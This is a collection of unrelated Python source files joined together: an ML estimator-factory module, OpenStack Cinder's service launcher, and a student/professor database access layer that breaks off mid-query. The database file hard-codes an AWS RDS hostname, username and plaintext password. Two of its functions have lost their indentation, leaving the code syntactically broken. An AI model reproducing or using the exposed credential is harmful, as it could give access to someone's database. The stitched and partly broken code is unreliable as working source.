        print("Totally spent {:.2f} seconds on prediction".format(time.time() - started_at))
        return predictions

    def staged_predict_proba(self, X):
        """
        Predict probabilities on each stage (attention: returns dictionary of generators)

        :param X: pandas.DataFrame of shape [n_samples, n_features]
        :rtype: dict[iterator]
        """
        stages = OrderedDict()
        for label, model in self.items():
            try:
                stages[label] = model.staged_predict_proba(X)
            except AttributeError:
                # estimator does not support staged predictions -- skip it
                pass
        return stages

    def test_on_lds(self, lds):
        """
        Prepare report for the factory of estimators.

        :param LabeledDataStorage lds: data
        :rtype: rep.report.classification.ClassificationReport
        """
        return classification.ClassificationReport(self, lds)
class RegressorsFactory(AbstractFactory):
    """
    Factory that trains several regressors in parallel so that their
    quality can be compared.
    """

    def add_regressor(self, name, regressor):
        """
        Add a regressor to the factory.

        :param str name: unique name for regressor.
            If name coincides with one already used, the old regressor will be replaced by one passed.
        :param regressor: regressor object

        .. note:: if type == sklearn.base.BaseEstimator, then features=None is used

        :type regressor: sklearn.base.BaseEstimator or estimators.interface.Regressor
        """
        if isinstance(regressor, Regressor):
            wrapped = regressor
        elif isinstance(regressor, BaseEstimator) and isinstance(regressor, RegressorMixin):
            wrapped = SklearnRegressor(regressor)
        else:
            raise NotImplementedError(
                'Supports only instances of sklearn.base.BaseEstimator or rep.estimators.interface.Regressor')
        self[name] = wrapped

    def predict(self, X, parallel_profile=None):
        """
        Predict values for all events in dataset.

        :param X: pandas.DataFrame of shape [n_samples, n_features]
        :param parallel_profile: profile
        :type parallel_profile: None or name of profile to parallelize computations.
        :rtype: OrderedDict[numpy.array of shape [n_samples] with float values]
        """
        predictions = OrderedDict()
        started_at = time.time()
        outcome = utils.map_on_cluster(parallel_profile, predict_estimator,
                                       list(self.keys()), list(self.values()),
                                       [X] * len(self), ['regression'] * len(self))
        for status, payload in outcome:
            if status == 'success':
                label, values, seconds = payload
                predictions[label] = values
                print('data was predicted by {:12} in {:.2f} seconds'.format(label, seconds))
            else:
                print('Problem while predicting on the node, report:\n', payload)
        print("Totally spent {:.2f} seconds on prediction".format(time.time() - started_at))
        return predictions

    def staged_predict(self, X):
        """
        Predicts values on each stage (dictionary of generators).

        :param X: pandas.DataFrame of shape [n_samples, n_features]
        :rtype: dict[iterator]
        """
        stages = OrderedDict()
        for label, model in self.items():
            try:
                stages[label] = model.staged_predict(X)
            except AttributeError:
                # estimator does not support staged predictions -- skip it
                pass
        return stages

    def test_on_lds(self, lds):
        """
        Report for the factory of estimators.

        :param LabeledDataStorage lds: data
        :rtype: rep.report.regression.RegressionReport
        """
        return regression.RegressionReport(self, lds)
def train_estimator(name, estimator, X, y, sample_weight=None):
    """
    Supplementary function.
    Trains one estimator on a separate node (or in a separate thread).

    :param str name: classifier name
    :param estimator: estimator
    :type estimator: Classifier or Regressor
    :param X: pandas.DataFrame of shape [n_samples, n_features]
    :param y: labels of events - array-like of shape [n_samples]
    :param sample_weight: weight of events,
           array-like of shape [n_samples] or None if all weights are equal
    :return: ('success', (name (str), estimator (Classifier or Regressor), time (int) )) or
             ('fail', (name (str), pid (int), socket (int), error (Exception) ))
    """
    try:
        started_at = time.time()
        # only forward sample_weight when it was actually given, so that
        # estimators without that keyword still work
        if sample_weight is None:
            estimator.fit(X, y)
        else:
            estimator.fit(X, y, sample_weight=sample_weight)
        return 'success', (name, estimator, time.time() - started_at)
    except Exception as problem:
        import os
        import socket
        # identify the worker that failed so the report is actionable
        return 'fail', (name, os.getpid(), socket.gethostname(), problem)
def predict_estimator(name, estimator, X, prediction_type='classification'):
    """
    Supplementary function.
    Builds predictions for one estimator on a separate node (or in a separate thread).

    :param str name: classifier name
    :param estimator: estimator
    :type estimator: Classifier or Regressor
    :param X: pandas.DataFrame of shape [n_samples, n_features]
    :param str prediction_type: 'classification' or 'regression' or 'classification-proba'
    :return: ('success', (name (str), probabilities (numpy.array), time (int) )) or
             ('fail', (name (str), pid (int), socket (int), error (Exception) ))
    """
    try:
        started_at = time.time()
        # classification and regression both use predict(); only the
        # probability variant differs
        if prediction_type in ('classification', 'regression'):
            result = estimator.predict(X)
        elif prediction_type == 'classification-proba':
            result = estimator.predict_proba(X)
        else:
            # raised inside try on purpose: reported as a 'fail' tuple just
            # like any other per-node problem
            raise NotImplementedError("Unknown problem type: {}".format(prediction_type))
        return 'success', (name, result, time.time() - started_at)
    except Exception as problem:
        import os
        import socket
        return 'fail', (name, os.getpid(), socket.gethostname(), problem)
|
|
# vim: tabstop=4 shiftwidth=4 softtabstop=4
# Copyright 2010 United States Government as represented by the
# Administrator of the National Aeronautics and Space Administration.
# Copyright 2011 Justin Santa Barbara
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""Generic Node base class for all workers that run on hosts."""
import inspect
import os
import random
import signal
import eventlet
import greenlet
from cinder import context
from cinder import db
from cinder import exception
from cinder import flags
from cinder.openstack.common import cfg
from cinder.openstack.common import importutils
from cinder.openstack.common import log as logging
from cinder.openstack.common import rpc
from cinder import utils
from cinder import version
from cinder import wsgi
LOG = logging.getLogger(__name__)

# Options controlling state reporting, periodic task scheduling and the
# volume API listener; registered on the global FLAGS object below so every
# consumer of cinder.flags sees them.
service_opts = [
    cfg.IntOpt('report_interval',
               default=10,
               help='seconds between nodes reporting state to datastore'),
    cfg.IntOpt('periodic_interval',
               default=60,
               help='seconds between running periodic tasks'),
    cfg.IntOpt('periodic_fuzzy_delay',
               default=60,
               help='range of seconds to randomly delay when starting the'
                    ' periodic task scheduler to reduce stampeding.'
                    ' (Disable by setting to 0)'),
    cfg.StrOpt('osapi_volume_listen',
               default="0.0.0.0",
               help='IP address for OpenStack Volume API to listen'),
    cfg.IntOpt('osapi_volume_listen_port',
               default=8776,
               help='port for os volume api to listen'), ]

FLAGS = flags.FLAGS
FLAGS.register_opts(service_opts)
class Launcher(object):
    """Launch one or more services and wait for them to complete."""

    def __init__(self):
        """Create a launcher with no running services.

        :returns: None

        """
        self._services = []

    @staticmethod
    def run_server(server):
        """Start a server and block until it finishes.

        :param server: Server to run and wait for.
        :returns: None

        """
        server.start()
        server.wait()

    def launch_server(self, server):
        """Run the given server in a green thread and track it.

        :param server: The server you would like to start.
        :returns: None

        """
        green_thread = eventlet.spawn(self.run_server, server)
        self._services.append(green_thread)

    def stop(self):
        """Kill every green thread started by this launcher.

        :returns: None

        """
        for green_thread in self._services:
            green_thread.kill()

    def wait(self):
        """Block until all launched services have stopped.

        :returns: None

        """
        def sigterm(sig, frame):
            LOG.audit(_("SIGTERM received"))
            # NOTE(jk0): Raise a ^C which is caught by the caller and cleanly
            # shuts down the service. This does not yet handle eventlet
            # threads.
            raise KeyboardInterrupt

        signal.signal(signal.SIGTERM, sigterm)
        for green_thread in self._services:
            try:
                green_thread.wait()
            except greenlet.GreenletExit:
                pass
class Service(object):
    """Service object for binaries running on hosts.

    A service takes a manager and enables rpc by listening to queues based
    on topic. It also periodically runs tasks on the manager and reports
    its state to the database services table."""

    def __init__(self, host, binary, topic, manager, report_interval=None,
                 periodic_interval=None, periodic_fuzzy_delay=None,
                 *args, **kwargs):
        # Identity of this service instance (also the DB lookup key).
        self.host = host
        self.binary = binary
        self.topic = topic
        # The manager (given as a dotted class path) owns the actual work;
        # extra args/kwargs are forwarded to its constructor.
        self.manager_class_name = manager
        manager_class = importutils.import_class(self.manager_class_name)
        self.manager = manager_class(host=self.host, *args, **kwargs)
        self.report_interval = report_interval
        self.periodic_interval = periodic_interval
        self.periodic_fuzzy_delay = periodic_fuzzy_delay
        super(Service, self).__init__(*args, **kwargs)
        # kept so the service could be re-created with the same arguments
        self.saved_args, self.saved_kwargs = args, kwargs
        # LoopingCall timers started in start(); stopped in stop()
        self.timers = []

    def start(self):
        """Register the service in the DB, wire up RPC consumers and start
        the report/periodic-task timers."""
        vcs_string = version.version_string_with_vcs()
        LOG.audit(_('Starting %(topic)s node (version %(vcs_string)s)'),
                  {'topic': self.topic, 'vcs_string': vcs_string})
        self.manager.init_host()
        self.model_disconnected = False
        ctxt = context.get_admin_context()
        # reuse the DB row for this (host, binary) pair when present,
        # otherwise create a fresh one
        try:
            service_ref = db.service_get_by_args(ctxt,
                                                 self.host,
                                                 self.binary)
            self.service_id = service_ref['id']
        except exception.NotFound:
            self._create_service_ref(ctxt)
        self.conn = rpc.create_connection(new=True)
        LOG.debug(_("Creating Consumer connection for Service %s") %
                  self.topic)
        rpc_dispatcher = self.manager.create_rpc_dispatcher()
        # Share this same connection for these Consumers
        self.conn.create_consumer(self.topic, rpc_dispatcher, fanout=False)
        # host-specific topic so messages can be addressed to this node
        node_topic = '%s.%s' % (self.topic, self.host)
        self.conn.create_consumer(node_topic, rpc_dispatcher, fanout=False)
        self.conn.create_consumer(self.topic, rpc_dispatcher, fanout=True)
        # Consume from all consumers in a thread
        self.conn.consume_in_thread()
        if self.report_interval:
            pulse = utils.LoopingCall(self.report_state)
            pulse.start(interval=self.report_interval,
                        initial_delay=self.report_interval)
            self.timers.append(pulse)
        if self.periodic_interval:
            # random initial delay spreads periodic tasks across nodes to
            # reduce stampeding (see the periodic_fuzzy_delay option)
            if self.periodic_fuzzy_delay:
                initial_delay = random.randint(0, self.periodic_fuzzy_delay)
            else:
                initial_delay = None
            periodic = utils.LoopingCall(self.periodic_tasks)
            periodic.start(interval=self.periodic_interval,
                           initial_delay=initial_delay)
            self.timers.append(periodic)

    def _create_service_ref(self, context):
        """Insert this service's row into the services table and remember
        its id."""
        zone = FLAGS.storage_availability_zone
        service_ref = db.service_create(context,
                                        {'host': self.host,
                                         'binary': self.binary,
                                         'topic': self.topic,
                                         'report_count': 0,
                                         'availability_zone': zone})
        self.service_id = service_ref['id']

    def __getattr__(self, key):
        # Unknown attributes are delegated to the manager, making the
        # service a transparent proxy for manager methods.
        manager = self.__dict__.get('manager', None)
        return getattr(manager, key)

    @classmethod
    def create(cls, host=None, binary=None, topic=None, manager=None,
               report_interval=None, periodic_interval=None,
               periodic_fuzzy_delay=None):
        """Instantiates class and passes back application object.

        :param host: defaults to FLAGS.host
        :param binary: defaults to basename of executable
        :param topic: defaults to bin_name - 'cinder-' part
        :param manager: defaults to FLAGS.<topic>_manager
        :param report_interval: defaults to FLAGS.report_interval
        :param periodic_interval: defaults to FLAGS.periodic_interval
        :param periodic_fuzzy_delay: defaults to FLAGS.periodic_fuzzy_delay
        """
        if not host:
            host = FLAGS.host
        if not binary:
            # the outermost stack frame belongs to the executable script
            binary = os.path.basename(inspect.stack()[-1][1])
        if not topic:
            topic = binary
        if not manager:
            subtopic = topic.rpartition('cinder-')[2]
            manager = FLAGS.get('%s_manager' % subtopic, None)
        if report_interval is None:
            report_interval = FLAGS.report_interval
        if periodic_interval is None:
            periodic_interval = FLAGS.periodic_interval
        if periodic_fuzzy_delay is None:
            periodic_fuzzy_delay = FLAGS.periodic_fuzzy_delay
        service_obj = cls(host, binary, topic, manager,
                          report_interval=report_interval,
                          periodic_interval=periodic_interval,
                          periodic_fuzzy_delay=periodic_fuzzy_delay)
        return service_obj

    def kill(self):
        """Destroy the service object in the datastore."""
        self.stop()
        try:
            db.service_destroy(context.get_admin_context(), self.service_id)
        except exception.NotFound:
            LOG.warn(_('Service killed that has no database entry'))

    def stop(self):
        """Close the RPC connection and stop all timers."""
        # Try to shut the connection down, but if we get any sort of
        # errors, go ahead and ignore them.. as we're shutting down anyway
        try:
            self.conn.close()
        except Exception:
            pass
        for x in self.timers:
            try:
                x.stop()
            except Exception:
                pass
        self.timers = []

    def wait(self):
        """Block until every timer has exited."""
        for x in self.timers:
            try:
                x.wait()
            except Exception:
                pass

    def periodic_tasks(self, raise_on_error=False):
        """Tasks to be run at a periodic interval."""
        ctxt = context.get_admin_context()
        self.manager.periodic_tasks(ctxt, raise_on_error=raise_on_error)

    def report_state(self):
        """Update the state of this service in the datastore."""
        ctxt = context.get_admin_context()
        zone = FLAGS.storage_availability_zone
        state_catalog = {}
        try:
            try:
                service_ref = db.service_get(ctxt, self.service_id)
            except exception.NotFound:
                # row vanished (e.g. cleaned up externally) -- recreate it
                LOG.debug(_('The service database object disappeared, '
                            'Recreating it.'))
                self._create_service_ref(ctxt)
                service_ref = db.service_get(ctxt, self.service_id)
            state_catalog['report_count'] = service_ref['report_count'] + 1
            if zone != service_ref['availability_zone']:
                state_catalog['availability_zone'] = zone
            db.service_update(ctxt,
                              self.service_id, state_catalog)
            # TODO(termie): make this pattern be more elegant.
            if getattr(self, 'model_disconnected', False):
                self.model_disconnected = False
                LOG.error(_('Recovered model server connection!'))
        # TODO(vish): this should probably only catch connection errors
        except Exception:  # pylint: disable=W0702
            if not getattr(self, 'model_disconnected', False):
                self.model_disconnected = True
                LOG.exception(_('model server went away'))
class WSGIService(object):
    """Provides ability to launch API from a 'paste' configuration."""

    def __init__(self, name, loader=None):
        """Initialize, but do not start, the WSGI server.

        :param name: The name of the WSGI server given to the loader.
        :param loader: Loads the WSGI application using the given name.
        :returns: None

        """
        self.name = name
        self.manager = self._get_manager()
        self.loader = loader or wsgi.Loader()
        self.app = self.loader.load_app(name)
        # listen address/port come from '<name>_listen[_port]' flags
        self.host = getattr(FLAGS, '%s_listen' % name, "0.0.0.0")
        self.port = getattr(FLAGS, '%s_listen_port' % name, 0)
        self.server = wsgi.Server(name,
                                  self.app,
                                  host=self.host,
                                  port=self.port)

    def _get_manager(self):
        """Initialize a Manager object appropriate for this service.

        Looks up the '<name>_manager' flag; when no class name is
        configured, just returns None.

        :returns: a Manager instance, or None.

        """
        flag_name = '%s_manager' % self.name
        if flag_name not in FLAGS:
            return None
        class_path = FLAGS.get(flag_name, None)
        if not class_path:
            return None
        return importutils.import_class(class_path)()

    def start(self):
        """Start serving this service using loaded configuration.

        Also retrieves the updated port number in case '0' was passed in,
        which indicates a random port should be used.

        :returns: None

        """
        if self.manager:
            self.manager.init_host()
        self.server.start()
        self.port = self.server.port

    def stop(self):
        """Stop serving this API.

        :returns: None

        """
        self.server.stop()

    def wait(self):
        """Wait for the service to stop serving this API.

        :returns: None

        """
        self.server.wait()
# NOTE(vish): the global launcher is to maintain the existing
#             functionality of calling service.serve +
#             service.wait
_launcher = None


def serve(*servers):
    """Launch every given server on the process-wide Launcher, creating it
    on first use."""
    global _launcher
    if _launcher is None:
        _launcher = Launcher()
    for svc in servers:
        _launcher.launch_server(svc)
def wait():
    """Log the active FLAGS (masking secrets) and block on the launcher.

    Waits until every launched server finishes; on Ctrl-C the launcher is
    stopped, and the RPC layer is cleaned up before returning.

    :returns: None
    """
    LOG.debug(_('Full set of FLAGS:'))
    for flag in FLAGS:
        flag_get = FLAGS.get(flag, None)
        # hide flag contents from log if contains a password
        # should use secret flag when switch over to openstack-common
        # FIX: guard flag_get before the substring test -- when
        # sql_connection is unset, '"mysql:" in None' raised TypeError
        if ("_password" in flag or "_key" in flag or
                (flag == "sql_connection" and flag_get is not None and
                 "mysql:" in flag_get)):
            LOG.debug(_('%(flag)s : FLAG SET ') % locals())
        else:
            LOG.debug('%(flag)s : %(flag_get)s' % locals())
    try:
        _launcher.wait()
    except KeyboardInterrupt:
        _launcher.stop()
    rpc.cleanup()
|
|
import bcrypt
import psycopg2
import psycopg2.extras
##Database Exceptional Class##
class invalidQueryException(Exception):
    """Application-level error raised for database connection failures and
    login/query problems."""
    pass
##Basic Connection Class for Database##
class database:
    # Opens a PostgreSQL connection on construction; `self.query` is a
    # NamedTupleCursor so rows expose columns as attributes.
    def __init__(self):
        # SECURITY NOTE(review): host and credentials are hard-coded in
        # source control; they should be moved to environment/config and
        # the exposed password rotated.
        self.__HOST = "myawsdatabase.c7mfxxgrjakk.ap-southeast-1.rds.amazonaws.com"
        #self.__HOST = "localhost" ##**For Local Database**##
        self.__DATABASE = "crazypetData"
        self.__DBUSER = "app"
        self.__DBPASS = "2rG3RSfTZ1"
        try:
            ##Opening Database Connection##
            self.connection = psycopg2.connect(host=self.__HOST,database=self.__DATABASE, user=self.__DBUSER, password=self.__DBPASS)
            self.query = self.connection.cursor(cursor_factory=psycopg2.extras.NamedTupleCursor)
        ##Cannot Connect to Database##
        except psycopg2.OperationalError:
            # surfaced as the application-level exception type
            raise invalidQueryException("Database Connection Error!")
    def disconnect(self):
        # Close the underlying connection; the cursor becomes unusable.
        self.connection.close()
##Database Class for Login-Related Functions##
class databaseLogin(database):
    """Login and account-management operations on the "GMan" schema.

    All statements are parameterized through the inherited psycopg2 cursor;
    passwords are stored only as bcrypt hashes.
    """
    ##Basic Login use to Login User##
    def userLogin(self, username, password):
        """Authenticate a user.

        :returns: (True, user_id, user_type, username, status) on success
        :raises invalidQueryException: on unknown username or wrong password
            (deliberately the same message for both cases)
        """
        password = bytes(password, encoding="ascii")
        SQL = "SELECT password, user_id, user_type, username, status FROM \"GMan\".user_login WHERE username = %s"
        DATA = (username,)
        self.query.execute(SQL, DATA)
        resultset = self.query.fetchone()
        if resultset is None:
            raise invalidQueryException("Either Username or Password is Incorrect")
        hashed = bytes(resultset.password, encoding="ascii")
        # hashpw(candidate, stored_hash) re-hashes with the stored salt, so
        # equality means the password matches
        if bcrypt.hashpw(password, hashed) == hashed:
            return True, resultset.user_id, resultset.user_type, resultset.username, resultset.status
        raise invalidQueryException("Either Username or Password is Incorrect")
    ##Create New Login for new Users##
    def createLogin(self, userid, username, email, password="DEFAULTPASS123456", userStatus=0, userType=0):
        """Create a login row plus a placeholder address row for a new user.

        :returns: (1, 1) on success, ("EXISTS", 0) if the user already exists
        """
        passwd_enc = bytes(password, encoding="ascii")
        passwd_hashed = bcrypt.hashpw(passwd_enc, bcrypt.gensalt(14))
        passwd_hashed_dec = passwd_hashed.decode(encoding="ascii")
        SQL = "INSERT INTO \"GMan\".user_login(user_id, username, password, email, status, user_type)VALUES(%s,%s,%s,%s,%s,%s)"
        DATA = (userid, username, passwd_hashed_dec, email, str(userStatus), str(userType))
        try:
            self.query.execute(SQL, DATA)
            self.connection.commit()
            SQL = "INSERT INTO \"GMan\".address (user_id, \"houseNumber\", street, \"subDistrict\", district, province, \"zipCode\") VALUES(%s, 'PLEASE UPDATE DATA', ' ', ' ', ' ', ' ', ' ')"
            DATA = (userid,)
            self.query.execute(SQL, DATA)
            self.connection.commit()
            return (1, 1)
        except psycopg2.IntegrityError:
            # FIX: roll back the aborted transaction -- without this every
            # later statement on the shared connection fails with
            # InFailedSqlTransaction
            self.connection.rollback()
            return ("EXISTS", 0)
    ##Edit Login Data##
    def editLogin(self, username, email, userStatus=0):
        """Update e-mail and status of an existing login row."""
        SQL = "UPDATE \"GMan\".user_login SET email=%s,status=%s WHERE username=%s"
        DATA = (email, str(userStatus), username)
        self.query.execute(SQL, DATA)
        self.connection.commit()
        return 1
    ##Edit Login Password##
    def changePassword(self, username, oldPassword, newPassword):
        """Verify oldPassword, then store a bcrypt hash of newPassword.

        :raises invalidQueryException: on unknown user or wrong old password
        """
        password = bytes(oldPassword, encoding="ascii")
        SQL = "SELECT password FROM \"GMan\".user_login WHERE username = %s"
        DATA = (username,)
        self.query.execute(SQL, DATA)
        resultset = self.query.fetchone()
        if resultset is None:
            raise invalidQueryException("Either Username or Password is Incorrect")
        hashed = bytes(resultset.password, encoding="ascii")
        if bcrypt.hashpw(password, hashed) != hashed:
            raise invalidQueryException("Either Username or Password is Incorrect")
        passwd_enc = bytes(newPassword, encoding="ascii")
        passwd_hashed = bcrypt.hashpw(passwd_enc, bcrypt.gensalt(14))
        passwd_hashed_dec = passwd_hashed.decode(encoding="ascii")
        SQL = "UPDATE \"GMan\".user_login SET password=%s WHERE username = %s"
        DATA = (passwd_hashed_dec, username)
        self.query.execute(SQL, DATA)
        self.connection.commit()
    ##Reset User Password##
    def resetPassword(self, user_id, username, email, new_pw):
        """Set a new password when user_id, username and e-mail all match.

        NOTE(review): there is no token/verification step here -- callers
        must have verified the user's identity before invoking this.
        """
        passwd_enc = bytes(new_pw, encoding="ascii")
        passwd_hashed = bcrypt.hashpw(passwd_enc, bcrypt.gensalt(14))
        passwd_hashed_dec = passwd_hashed.decode(encoding="ascii")
        SQL = "UPDATE \"GMan\".user_login SET password=%s WHERE username = %s AND user_id = %s AND email = %s"
        DATA = (passwd_hashed_dec, username, user_id, email)
        self.query.execute(SQL, DATA)
        self.connection.commit()
    ##Block and Un-Block Users##
    def blockUser(self, command, status, userid):
        """Block or unblock a login and mirror the state on the role table.

        :param command: "BLOCK" or "UNBLOCK"
        :param status: 0 for students, 1 for professors
        :raises invalidQueryException: on an unknown command/status pair
        """
        login_status = {"BLOCK": 1, "UNBLOCK": 0}.get(command)
        role_table = {0: "student", 1: "professor"}.get(status)
        if login_status is None or role_table is None:
            # FIX: an unmatched pair previously left SQL undefined and the
            # method crashed with UnboundLocalError
            raise invalidQueryException("Unknown block command or user type")
        # blocked users get status 6 on their role table, unblocked get 0
        role_status = 6 if command == "BLOCK" else 0
        DATA = (userid,)
        SQL = "UPDATE \"GMan\".user_login SET status=%d WHERE user_id=%%s" % login_status
        self.query.execute(SQL, DATA)
        self.connection.commit()
        SQL = "UPDATE \"GMan\".%s SET status=%d WHERE user_id=%%s" % (role_table, role_status)
        self.query.execute(SQL, DATA)
        self.connection.commit()
        return 1
    ##Suspend and Un-Suspend Users##
    def suspendUser(self, command, type, userid):
        """Suspend ("SUSP", status 4) or reinstate ("UNSUSP", status 0).

        `type` shadows the builtin but is kept for caller compatibility; it
        must be "STUDENT" or "PROFESSOR".
        :raises invalidQueryException: on unknown command or user type
        """
        role_table = {"STUDENT": "student", "PROFESSOR": "professor"}.get(type)
        new_status = {"SUSP": 4, "UNSUSP": 0}.get(command)
        if role_table is None or new_status is None:
            # FIX: an unmatched pair previously left SQL undefined and the
            # method crashed with UnboundLocalError
            raise invalidQueryException("Unknown suspend command or user type")
        SQL = "UPDATE \"GMan\".%s SET status=%d WHERE user_id=%%s" % (role_table, new_status)
        DATA = (userid,)
        self.query.execute(SQL, DATA)
        self.connection.commit()
        return 1
    ##Retire Users##
    def retireUser(self, type, userid):
        """Mark a student or professor as retired (status 5).

        :raises invalidQueryException: on unknown user type
        """
        role_table = {"STUDENT": "student", "PROFESSOR": "professor"}.get(type)
        if role_table is None:
            # FIX: an unknown type previously left SQL undefined and the
            # method crashed with UnboundLocalError
            raise invalidQueryException("Unknown user type")
        SQL = "UPDATE \"GMan\".%s SET status=5 WHERE user_id=%%s" % role_table
        DATA = (userid,)
        self.query.execute(SQL, DATA)
        self.connection.commit()
        return 1
##Delete Login Data##
def deleteLogin(self,userid,username):
SQL = "DELETE FROM \"GMan\".user_login WHERE user_id=%s AND username =%s";
DATA = (userid, username)
self.query.execute(SQL, DATA)
self.connection.commit()
##Get User Information##
def getInformationUser(self, userid):
SQL = "SELECT user_type, username, user_id FROM \"GMan\".user_login WHERE user_id = %s"
DATA = (userid,)
self.query.execute(SQL, DATA)
resultset = self.query.fetchone()
if(resultset is not None):
if(resultset.user_type == 0):
SQL = "SELECT * FROM \"GMan\".student WHERE user_id = %s"
DATA = (userid,)
self.query.execute(SQL, DATA)
resultsetData = self.query.fetchone()
if (resultset.user_type == 1):
SQL = "SELECT * FROM \"GMan\".professor WHERE user_id = %s"
DATA = (userid,)
self.query.execute(SQL, DATA)
resultsetData = self.query.fetchone()
if (resultset.user_type == 2):
SQL = "SELECT * FROM \"GMan\".admin WHERE user_id = %s"
DATA = (userid,)
self.query.execute(SQL, DATA)
resultsetData = self.query.fetchone()
return (resultset,resultsetData, resultset.user_type)
return(None, None,None)
##Database Class for User-Related Functions##
class databaseUser(database):
    """Database access for user-profile related operations (profiles,
    addresses, faculties/majors, profile pictures, user creation)."""

    # Profile tables keyed by user_type: 0 = student, 1 = professor, 2 = admin.
    # Fixed whitelist -- never built from user input.
    _PROFILE_TABLES = {0: "student", 1: "professor", 2: "admin"}

    def getInfo(self, inp_data):
        """Return the profile row for a user.

        inp_data: sequence where [1] is the user id and [2] is the user_type.
        Returns None for an unrecognised user_type, matching the original
        fall-through behaviour.
        """
        table = self._PROFILE_TABLES.get(inp_data[2])
        if table is None:
            return None
        SQL = "SELECT * FROM \"GMan\".%s WHERE user_id =%%s" % table
        DATA = (inp_data[1],)
        self.query.execute(SQL, DATA)
        resultset = self.query.fetchone()
        return resultset

    def getAddress(self, inp_data):
        """Return the address row for the user id held in inp_data[1]."""
        SQL = "SELECT * FROM \"GMan\".address WHERE user_id =%s"
        DATA = (inp_data[1],)
        self.query.execute(SQL, DATA)
        resultset = self.query.fetchone()
        return resultset

    def getFaculty(self, inp_data):
        """Return the faculty row for faculty id *inp_data* (or None)."""
        SQL = "SELECT * FROM \"GMan\".faculty WHERE \"facultyID\" =%s"
        DATA = (inp_data,)
        self.query.execute(SQL, DATA)
        resultset = self.query.fetchone()
        return resultset

    def getMajor(self, inp_data):
        """Return the major row for major id *inp_data* (or None)."""
        SQL = "SELECT * FROM \"GMan\".majors WHERE \"majorID\" =%s"
        DATA = (inp_data,)
        self.query.execute(SQL, DATA)
        resultset = self.query.fetchone()
        return resultset

    def updateAddress(self, user_id, homeNum, street, sDistrict, district, province, zip):
        """Overwrite every address field of a user.  Returns 1."""
        SQL = "UPDATE \"GMan\".address SET \"houseNumber\"=%s, street=%s, \"subDistrict\"=%s, district=%s, province=%s, \"zipCode\"=%s WHERE user_id=%s"
        DATA = (homeNum, street, sDistrict, district, province, zip, user_id)
        self.query.execute(SQL, DATA)
        self.connection.commit()
        return 1

    def editProfilePicture(self, blob, user_id):
        """Store *blob* as the user's profile picture.  Returns 1."""
        SQL = "UPDATE \"GMan\".user_login SET picture=%s WHERE user_id=%s"
        DATA = (blob, user_id)
        self.query.execute(SQL, DATA)
        self.connection.commit()
        return 1

    def getProfilePicture(self, user_id):
        """Return (picture_row, 1) for the given user id."""
        SQL = "SELECT picture FROM \"GMan\".user_login WHERE user_id =%s"
        DATA = (user_id,)
        self.query.execute(SQL, DATA)
        resultset = self.query.fetchone()
        return resultset, 1

    def createStudent(self, userid, name, surname, email, faculty, major):
        """Insert a first-year student (year 1, status 0, GPA 0.00).

        Returns (1, 1) on success, or (pgcode, pgerror) on an integrity or
        data error.
        """
        # The current term is copied from an arbitrary existing student row;
        # assumes at least one student already exists -- TODO confirm.
        SQL = "SELECT term FROM \"GMan\".student"
        self.query.execute(SQL)
        resultset = self.query.fetchone()
        term = resultset.term
        try:
            SQL = "INSERT INTO \"GMan\".student (user_id, \"name\", surname, email, \"year\", status, gpa, \"facultyID\", \"majorID\", term) \
            VALUES(%s, %s, %s, %s, %s, %s, %s, %s, %s, %s)"
            DATA = (userid, name, surname, email, 1, 0, 0.00, faculty, major, int(term))
            self.query.execute(SQL, DATA)
            self.connection.commit()
            return (1, 1)
        except psycopg2.IntegrityError as e:
            print(e.pgcode, e.pgerror)
            return (str(e.pgcode), e.pgerror)
        except psycopg2.DataError as e:
            print(e.pgcode, e.pgerror)
            return (str(e.pgcode), e.pgerror)

    def createProfessor(self, userid, name, surname, email, facultyID):
        """Insert a professor (position 0, status 0).

        Returns (1, 1) on success, or (pgcode, pgerror) on an integrity or
        data error.
        """
        try:
            SQL = "INSERT INTO \"GMan\".professor (user_id, \"name\", surname, email, \"position\", status, \"facultyID\")\
            VALUES(%s, %s,%s, %s, %s,%s, %s)"
            DATA = (userid, name, surname, email, 0, 0, facultyID)
            self.query.execute(SQL, DATA)
            self.connection.commit()
            return (1, 1)
        except psycopg2.IntegrityError as e:
            print(e.pgcode, e.pgerror)
            return (str(e.pgcode), e.pgerror)
        except psycopg2.DataError as e:
            print(e.pgcode, e.pgerror)
            return (str(e.pgcode), e.pgerror)

    def createAdmin(self, userid, name, surname, email):
        """Insert an administrator (position 0, status 0).

        Returns (1, 1) on success, or (pgcode, pgerror) on an integrity or
        data error.
        """
        try:
            SQL = "INSERT INTO \"GMan\".admin (user_id, \"name\", surname, email, \"position\", status)\
            VALUES(%s, %s,%s, %s, %s,%s)"
            DATA = (userid, name, surname, email, 0, 0)
            self.query.execute(SQL, DATA)
            self.connection.commit()
            return (1, 1)
        except psycopg2.IntegrityError as e:
            print(e.pgcode, e.pgerror)
            return (str(e.pgcode), e.pgerror)
        except psycopg2.DataError as e:
            print(e.pgcode, e.pgerror)
            return (str(e.pgcode), e.pgerror)
##Database Class for Course-Related Functions##
class databaseCourse(database):
    """Database access for the course catalogue and enrolment.

    NOTE(review): course."maxStud" appears to track the number of *remaining*
    seats (it is decremented on enrol, incremented on drop, and reset from
    "amt" elsewhere) -- confirm against the schema.
    """

    def getCourseName(self, courseID):
        """Return the row holding the name of course *courseID* (or None)."""
        SQL = "SELECT \"courseName\" FROM \"GMan\".course WHERE \"courseID\"=%s"
        DATA = (courseID,)
        self.query.execute(SQL, DATA)
        resultset = self.query.fetchone()
        return resultset

    def getCourseProfessor(self, professorID):
        """Return every course taught by *professorID*."""
        SQL = "SELECT * FROM \"GMan\".course WHERE \"professorID\"=%s"
        DATA = (professorID,)
        self.query.execute(SQL, DATA)
        resultset = self.query.fetchall()
        return resultset

    def getCourseFaculty(self, facultyID):
        """Return every course of a faculty, ordered by major then course id."""
        SQL = "SELECT * FROM \"GMan\".course WHERE \"facultyID\"=%s ORDER BY \"majorID\", \"courseID\""
        DATA = (facultyID,)
        self.query.execute(SQL, DATA)
        resultset = self.query.fetchall()
        return resultset

    def termCourse(self, faculty, major, year, term):
        """Return courses offered for a faculty/major in a given year and term."""
        SQL = "SELECT * FROM \"GMan\".course WHERE \"facultyID\"=%s AND \"majorID\"=%s AND \"year\"=%s AND term =%s \
